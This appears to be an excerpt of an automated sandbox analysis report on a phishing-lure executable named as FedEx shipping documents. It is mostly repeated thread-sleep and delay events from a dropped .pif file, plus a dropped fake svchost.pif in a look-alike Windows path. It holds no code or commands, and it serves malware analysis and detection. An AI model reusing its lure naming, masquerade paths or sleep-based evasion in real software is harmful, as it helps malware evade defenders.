Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596334
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596134
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595995
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595865
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595713
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595576
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595368
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594569
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594312
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594155
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593842
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593708
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593582
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593460
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593351
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593241
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593132
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 593023
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592913
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592804
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592695
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592585
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592476
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592366
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592257
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592148
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 592014
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591896
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591763
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591617
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591483
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591381
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591257
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591147
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 591037
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599875
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599765
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599656
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599547
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599435
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599271
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599155
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599037
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598922
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598797
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598687
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598578
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598469
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598344
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598234
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598125
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598016
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597906
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597797
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597687
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597578
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597469
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597359
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597249
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597140
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 597031
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596911
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596774
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596440
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596294
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596162
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 596033
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595913
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595812
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595703
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595593
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595480
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595375
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595266
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595156
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 595047
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594937
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594827
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594719
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594594
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594484
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594375
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594265
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 594154

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 2076	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 7759	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: foregroundWindowGot 1585	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 4296
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 5488
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: foregroundWindowGot 1590
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 5005
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: threadDelayed 4830
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Window / User API: foregroundWindowGot 1631

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Dropped PE file which has not been started: C:\Windows \SysWOW64\svchost.pif

Jump to dropped file

Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -34126476536362649s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599880s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599764s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599168s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -599046s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598828s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598609s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598500s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598390s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598281s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598172s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -598058s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597953s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597844s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597720s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597594s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597374s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597156s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -597047s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596828s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596719s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596592s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596479s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596365s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596248s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596123s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -596015s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595906s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595577s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595469s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595359s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595250s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595141s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -595031s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594922s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594812s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594703s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594593s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594370s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 7816	Thread sleep time: -594266s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599874s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599764s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599655s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599436s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599327s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599217s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599109s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -599000s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598888s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598781s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598671s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598535s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598406s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598295s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -598175s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -597641s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -597468s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -597360s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -597249s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -597137s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596954s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596848s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596720s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596595s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596468s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596334s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -596134s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -595995s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -595865s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -595713s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -595576s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -595368s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -594569s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -594312s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -594155s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -594000s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593842s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593708s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593582s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593460s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593351s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593241s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593132s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -593023s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592913s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592804s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592695s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592585s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592476s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592366s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592257s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592148s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -592014s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591896s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591763s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591617s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591483s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591381s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591257s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591147s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 8096	Thread sleep time: -591037s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep count: 39 > 30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -35971150943733603s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -600000s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 768	Thread sleep count: 5005 > 30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599875s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 768	Thread sleep count: 4830 > 30
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599765s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599656s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599547s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599435s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599271s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599155s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -599037s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598922s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598797s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598687s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598578s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598469s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598344s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598234s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598125s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -598016s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597906s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597797s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597687s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597578s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597469s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597359s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597249s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597140s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -597031s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596911s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596774s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596440s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596294s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596162s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -596033s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595913s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595812s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595703s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595593s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595480s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595375s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595266s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595156s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -595047s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594937s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594827s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594719s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594594s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594484s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594375s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594265s >= -30000s
Source: C:\Users\Public\Libraries\hzwdvhxM.pif TID: 6052	Thread sleep time: -594154s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\FEDEX_SHIPPING_DOCUMENTS_MUO98376_B324.exe

Code function: 0_2_02D5534C GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,

0_2_02D5534C

Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599880	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599764	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599281	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599168	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 599046	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598937	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598828	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598719	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598609	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598500	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598390	Jump to behavior
Source: C:\Users\Public\Libraries\hzwdvhxM.pif	Thread delayed: delay time: 598281	Jump to behavior
